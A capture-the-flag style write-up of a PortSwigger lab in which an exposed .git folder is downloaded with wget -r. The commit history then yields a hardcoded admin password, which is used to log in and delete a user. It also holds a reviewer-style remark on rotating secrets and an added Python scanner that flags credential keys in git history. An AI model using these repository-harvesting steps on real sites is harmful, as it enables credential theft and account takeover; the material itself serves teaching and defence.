
🗂️PortSwigger Lab Writeup: Information Disclosure in Version Control History

PortSwigger lab description page for Info Disclosure via Git


🎯 Objective

The objective of this lab is to discover an information disclosure vulnerability in a web application that has exposed its .git folder publicly in production. Our goal is to recover secrets from the repository (the admin password), use them to log in as administrator, and delete the user carlos.

  • Lab URL: https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history
  • Category: Information Disclosure
  • Difficulty: Practitioner

🧪 Exploitation Steps

🕵️Step 1: Observe the Website

  • First, open the lab URL in your browser and observe what the site is and how it works.
    Screenshot: lab instance showing the shopping website interface
    Screenshot: login page of the lab instance
  • At first glance, the website is a shopping site with a login page. The lab description states that there is a .git folder and that we need to access it.

🧰Step 2: Accessing Git folder

  • To check for an exposed repository, open the /.git/ path in the browser.
    Screenshot: the /.git/ directory listing accessible in the browser
  • The directory listing confirms that the .git folder is publicly exposed.
  • Next, download the .git folder to our system with wget and inspect the repository locally with git commands.
    wget -r https://0a0f0068035543e8d1a31241009800f3.web-security-academy.net/.git/
  • Change into the directory where the .git folder was downloaded.
  • List the commits it contains with the following command.
    └─$ git log 
    commit 3a60c4b4d982498f44bacf9cd5e3a5d722e48624 (HEAD -> master)
    Author: Carlos Montoya <carlos@carlos-montoya.net>
    Date: Tue Jun 23 14:05:07 2020 +0000

    Remove admin password from config

    commit 553186c28dbd199fbcef0004af4c0490d00c6896
    Author: Carlos Montoya <carlos@carlos-montoya.net>
    Date: Mon Jun 22 16:23:42 2020 +0000

    Add skeleton admin panel
  • There is a commit described as "Remove admin password from config". Let's look at what changes that commit contains.
    └─$ git show 3a60c4b4d982498f44bacf9cd5e3a5d722e48624
    commit 3a60c4b4d982498f44bacf9cd5e3a5d722e48624 (HEAD -> master)
    Author: Carlos Montoya <carlos@carlos-montoya.net>
    Date: Tue Jun 23 14:05:07 2020 +0000

    Remove admin password from config

    diff --git a/admin.conf b/admin.conf
    index ad1ca22..21d23f1 100644
    --- a/admin.conf
    +++ b/admin.conf
    @@ -1 +1 @@
    -ADMIN_PASSWORD=ddgh8u5d2wezel6bp519
    +ADMIN_PASSWORD=env('ADMIN_PASSWORD')
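Review bot: the value on the removed `-ADMIN_PASSWORD=ddgh8u5d2wezel6bp519` line stays fully recoverable from this commit (as the `git show` above demonstrates), so replacing it with `env('ADMIN_PASSWORD')` in the working tree does not fix the exposure by itself; the credential needs to be rotated, and if the history is to be published or the repository has already been served, the commit also needs to be rewritten out of history. A commit message that records only "Remove admin password from config" should say whether the rotation happened, otherwise a reader of the history assumes the old value is still live.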
  • The removed line of that diff reveals the administrator password that was hardcoded in admin.conf: deleting it from the file did not delete it from the repository history, so anyone with the exposed .git folder can still read it.

🚀Step 3: Delete carlos

  • Copy the administrator password extracted from the git history and log in as administrator.
    Screenshot: administrator login page with the extracted password
    Screenshot: logged-in administrator account with the Admin Panel option
  • Open the Admin Panel and delete the user carlos to complete the lab.
    Screenshot: PortSwigger lab solved confirmation banner after deleting carlos
  • Finally, the lab is solved.

🧠 Conclusion

  • This lab showed how an exposed .git repository can leak sensitive information: by downloading the .git folder and inspecting commits we recovered the hardcoded ADMIN_PASSWORD, used it to log in as administrator, and deleted carlos.
  • Such leaks have a severe impact - attackers can retrieve source code, credentials, API keys, and history of secret removals, then pivot to full system compromise.
  • This highlights the importance of keeping .git out of the webroot, disabling directory listing, never committing secrets (use environment variables or a secrets manager), and rotating any credentials that were ever committed, since removing them in a later commit leaves them readable in history.
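As an added defensive example (my own code, not part of the original writeup and not PortSwigger's), the script below does for a whole repository history what Step 2 did by hand with `git show`: it walks the text output of `git log -p`, records every added or removed line whose key looks like a credential, and reports whether the value is still present or was only deleted in a later commit. Either way the value must be rotated, which is the mitigation the conclusion calls for. The sample log is constructed to mirror the shape of the lab's history but uses a made-up placeholder value; the function names and the key pattern list are my own assumptions.

```python
import re

# Constructed sample of `git log -p` output, newest commit first, shaped like the
# lab's history. The password value is a placeholder, not the lab's real one.
SAMPLE_GIT_LOG = """\
commit 3a60c4b4d982498f44bacf9cd5e3a5d722e48624
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date:   Tue Jun 23 14:05:07 2020 +0000

    Remove admin password from config

diff --git a/admin.conf b/admin.conf
index ad1ca22..21d23f1 100644
--- a/admin.conf
+++ b/admin.conf
@@ -1 +1 @@
-ADMIN_PASSWORD=example-placeholder-secret
+ADMIN_PASSWORD=env('ADMIN_PASSWORD')

commit 553186c28dbd199fbcef0004af4c0490d00c6896
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date:   Mon Jun 22 16:23:42 2020 +0000

    Add skeleton admin panel

diff --git a/admin.conf b/admin.conf
new file mode 100644
index 0000000..ad1ca22
--- /dev/null
+++ b/admin.conf
@@ -0,0 +1 @@
+ADMIN_PASSWORD=example-placeholder-secret
"""

# A changed line whose key name suggests a credential (assumed list of markers).
SECRET_LINE_RE = re.compile(
    r"^[+-](?P<key>[A-Za-z0-9_]*(?:PASSWORD|PASSWD|SECRET|TOKEN|API_KEY)[A-Za-z0-9_]*)"
    r"\s*=\s*(?P<value>.+?)\s*$",
    re.IGNORECASE,
)
# Values that are references rather than literals, e.g. env('X') or ${X}.
PLACEHOLDER_RE = re.compile(r"^(?:env\(|\$\{|\$[A-Za-z_][A-Za-z0-9_]*$|<[^>]*>$)")


def find_secrets_in_history(log_text):
    """Return one finding per added/removed literal credential line in a git log -p dump."""
    findings = []
    commit = None
    path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            new_path = line[4:]
            path = new_path[2:] if new_path.startswith("b/") else new_path
        elif line.startswith("--- "):
            continue  # old-path header, not a removed content line
        elif line[:1] in "+-" and commit is not None:
            m = SECRET_LINE_RE.match(line)
            if not m or PLACEHOLDER_RE.match(m.group("value")):
                continue
            findings.append({
                "commit": commit,
                "path": path,
                "key": m.group("key"),
                "value": m.group("value"),
                "removed": line.startswith("-"),
            })
    return findings


def rotation_report(findings):
    """Map each (path, key) to 'removed-but-in-history' or 'still-present'.

    The log is newest first, so the first finding for a key tells its current state;
    both states mean the literal value is recoverable and must be rotated.
    """
    report = {}
    for f in findings:
        ident = (f["path"], f["key"])
        if ident not in report:
            report[ident] = "removed-but-in-history" if f["removed"] else "still-present"
    return report


if __name__ == "__main__":
    found = find_secrets_in_history(SAMPLE_GIT_LOG)
    for f in found:
        state = "removed" if f["removed"] else "added"
        print(f"{f['commit'][:12]} {f['path']}: {f['key']} {state} (value recoverable)")
    for (path, key), state in rotation_report(found).items():
        print(f"ROTATE {key} in {path}: {state}")
```

On a real repository, feed it `git log -p --all` so that branches and tags are covered too; the same parser works because the script only depends on the textual diff format. A key that shows up as "removed-but-in-history" is exactly the lab's situation: the working tree looks clean while the secret is one `git show` away.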